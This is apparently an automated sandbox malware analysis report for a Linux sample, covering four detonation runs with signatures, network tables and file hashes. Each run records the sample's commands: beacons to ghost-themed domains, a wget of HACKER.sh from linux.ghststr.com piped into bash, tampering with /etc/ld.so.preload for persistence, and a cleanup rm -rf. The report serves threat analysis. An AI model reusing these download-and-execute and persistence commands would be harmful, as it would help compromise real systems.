Malware Analysis Report

2025-01-23 15:27

Sample ID 240417-tsdvzafb67
Target f62d2741ab07c859c2036988259d0b45_JaffaCakes118
SHA256 03f504de2e804c515de12411e431085f509a593c5ec8e512adb0641eed87f287
Tags
antivm persistence
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

03f504de2e804c515de12411e431085f509a593c5ec8e512adb0641eed87f287

Threat Level: Likely malicious

The file f62d2741ab07c859c2036988259d0b45_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

antivm persistence

Modifies the dynamic linker configuration file

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-17 16:18

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-17 16:18

Reported

2024-04-17 16:21

Platform

debian9-armhf-20240226-en

Max time kernel

13s

Max time network

17s

Command Line

[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]

Signatures

Modifies the dynamic linker configuration file

persistence
Description Indicator Process Target
File opened for modification /etc/ld.so.preload /tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/self/fd N/A N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.8xapVZ /usr/bin/apt-get N/A
File opened for modification /tmp/.../t.sh /usr/bin/wget N/A
File opened for modification /tmp/fileutl.message.rBaWlO /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.GXSL7N /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.Yq9DyS /usr/bin/apt-get N/A

Processes

/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118

[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]

/bin/sed

[sed -En s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p]

/usr/bin/apt-get

[apt-get install curl -y]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/curl

[curl https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]

/usr/bin/wget

[wget -q https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]

/usr/bin/curl

[curl https://ghostsecurityteam.net/1/ -o /dev/null]

/usr/bin/wget

[wget https://ghostsecurityteam.net/1/ -O /dev/null]

/usr/bin/curl

[curl https://ghostsecurityteam.net/2/ -o /dev/null]

/usr/bin/wget

[wget https://ghostsecurityteam.net/2/ -O /dev/null]

/bin/mkdir

[mkdir ...]

/usr/bin/wget

[wget --quiet http://linux.ghststr.com/LLLOL/HACKER.sh -O t.sh]

/bin/bash

[bash t.sh]

/bin/rm

[rm -rf /tmp/...]

Network

Country Destination Domain Proto
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 linux.ghststr.com udp
US 1.1.1.1:53 linux.ghststr.com udp

Files

/root/.bash_history

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-17 16:18

Reported

2024-04-17 16:21

Platform

debian9-mipsbe-20240226-en

Max time kernel

14s

Max time network

16s

Command Line

[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]

Signatures

Modifies the dynamic linker configuration file

persistence
Description Indicator Process Target
File opened for modification /etc/ld.so.preload /tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118 N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/self/fd N/A N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.2IC6wm /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.Qzd0iI /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.SRY9a9 /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.SudRtB /usr/bin/apt-get N/A
File opened for modification /tmp/.../t.sh /usr/bin/wget N/A

Processes

/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118

[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]

/bin/sed

[sed -En s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p]

/usr/bin/apt-get

[apt-get install curl -y]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/curl

[curl https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]

/usr/bin/wget

[wget -q https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]

/usr/bin/curl

[curl https://ghostsecurityteam.net/1/ -o /dev/null]

/usr/bin/wget

[wget https://ghostsecurityteam.net/1/ -O /dev/null]

/usr/bin/curl

[curl https://ghostsecurityteam.net/2/ -o /dev/null]

/usr/bin/wget

[wget https://ghostsecurityteam.net/2/ -O /dev/null]

/bin/mkdir

[mkdir ...]

/usr/bin/wget

[wget --quiet http://linux.ghststr.com/LLLOL/HACKER.sh -O t.sh]

/bin/bash

[bash t.sh]

/bin/rm

[rm -rf /tmp/...]

Network

Country Destination Domain Proto
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 linux.ghststr.com udp
US 1.1.1.1:53 linux.ghststr.com udp

Files

/root/.bash_history

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-17 16:18

Reported

2024-04-17 16:21

Platform

debian9-mipsel-20240226-en

Max time kernel

19s

Max time network

20s

Command Line

[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]

Signatures

Modifies the dynamic linker configuration file

persistence
Description Indicator Process Target
File opened for modification /etc/ld.so.preload /tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118 N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/self/fd N/A N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.../t.sh /usr/bin/wget N/A
File opened for modification /tmp/fileutl.message.SCA3Ao /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.SgW38J /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.4AOdCe /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.GaCaCK /usr/bin/apt-get N/A

Processes

/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118

[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]

/bin/sed

[sed -En s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p]

/usr/bin/apt-get

[apt-get install curl -y]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/curl

[curl https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]

/usr/bin/wget

[wget -q https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]

/usr/bin/curl

[curl https://ghostsecurityteam.net/1/ -o /dev/null]

/usr/bin/wget

[wget https://ghostsecurityteam.net/1/ -O /dev/null]

/usr/bin/curl

[curl https://ghostsecurityteam.net/2/ -o /dev/null]

/usr/bin/wget

[wget https://ghostsecurityteam.net/2/ -O /dev/null]

/bin/mkdir

[mkdir ...]

/usr/bin/wget

[wget --quiet http://linux.ghststr.com/LLLOL/HACKER.sh -O t.sh]

/bin/bash

[bash t.sh]

/bin/rm

[rm -rf /tmp/...]

Network

Country Destination Domain Proto
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 linux.ghststr.com udp
US 1.1.1.1:53 linux.ghststr.com udp

Files

/root/.bash_history

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-17 16:18

Reported

2024-04-17 16:21

Platform

ubuntu1804-amd64-20240226-en

Max time kernel

6s

Max time network

135s

Command Line

[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]

Signatures

Modifies the dynamic linker configuration file

persistence
Description Indicator Process Target
File opened for modification /etc/ld.so.preload /tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118 N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/self/fd N/A N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.jPHFPi /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.WW6N6L /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.PfjOK0 /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.z8f0Jt /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.aZrqJ7 /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.x1ShXA /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.jwg07S /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.J8dblm /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.VOjKzP /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.Bn7ROW /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.imb1Wp /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.jbUkxE /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.bMS5sx /usr/bin/apt-get N/A
File opened for modification /tmp/.../t.sh /usr/bin/wget N/A
File opened for modification /tmp/fileutl.message.MgHAgI /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.7yNJnb /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.5jSxc4 /usr/bin/apt-get N/A

Processes

/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118

[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]

/bin/sed

[sed -En s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p]

/usr/bin/apt-get

[apt-get install curl -y]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/curl

[curl https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]

/usr/bin/wget

[wget -q https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]

/usr/bin/curl

[curl https://ghostsecurityteam.net/1/ -o /dev/null]

/usr/bin/wget

[wget https://ghostsecurityteam.net/1/ -O /dev/null]

/usr/bin/curl

[curl https://ghostsecurityteam.net/2/ -o /dev/null]

/usr/bin/wget

[wget https://ghostsecurityteam.net/2/ -O /dev/null]

/bin/mkdir

[mkdir ...]

/usr/bin/wget

[wget --quiet http://linux.ghststr.com/LLLOL/HACKER.sh -O t.sh]

/bin/bash

[bash t.sh]

/bin/rm

[rm -rf /tmp/...]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 151.101.130.49:443 tcp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 linux.ghststr.com udp
US 1.1.1.1:53 linux.ghststr.com udp
US 151.101.65.91:443 tcp
GB 195.181.164.14:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 1.1.1.1:53 cdn.fwupd.org udp
US 1.1.1.1:53 cdn.fwupd.org udp
US 151.101.194.49:443 cdn.fwupd.org tcp
US 151.101.65.91:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.5:443 1527653184.rsc.cdn77.org tcp

Files

/tmp/fileutl.message.z8f0Jt

MD5 373fe2f2ef99005d2550a482f09a3e51
SHA1 68e6572b55b1e77f7d171ebac7b2579b7a6bd51d
SHA256 7552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5
SHA512 def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b

/root/.bash_history

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09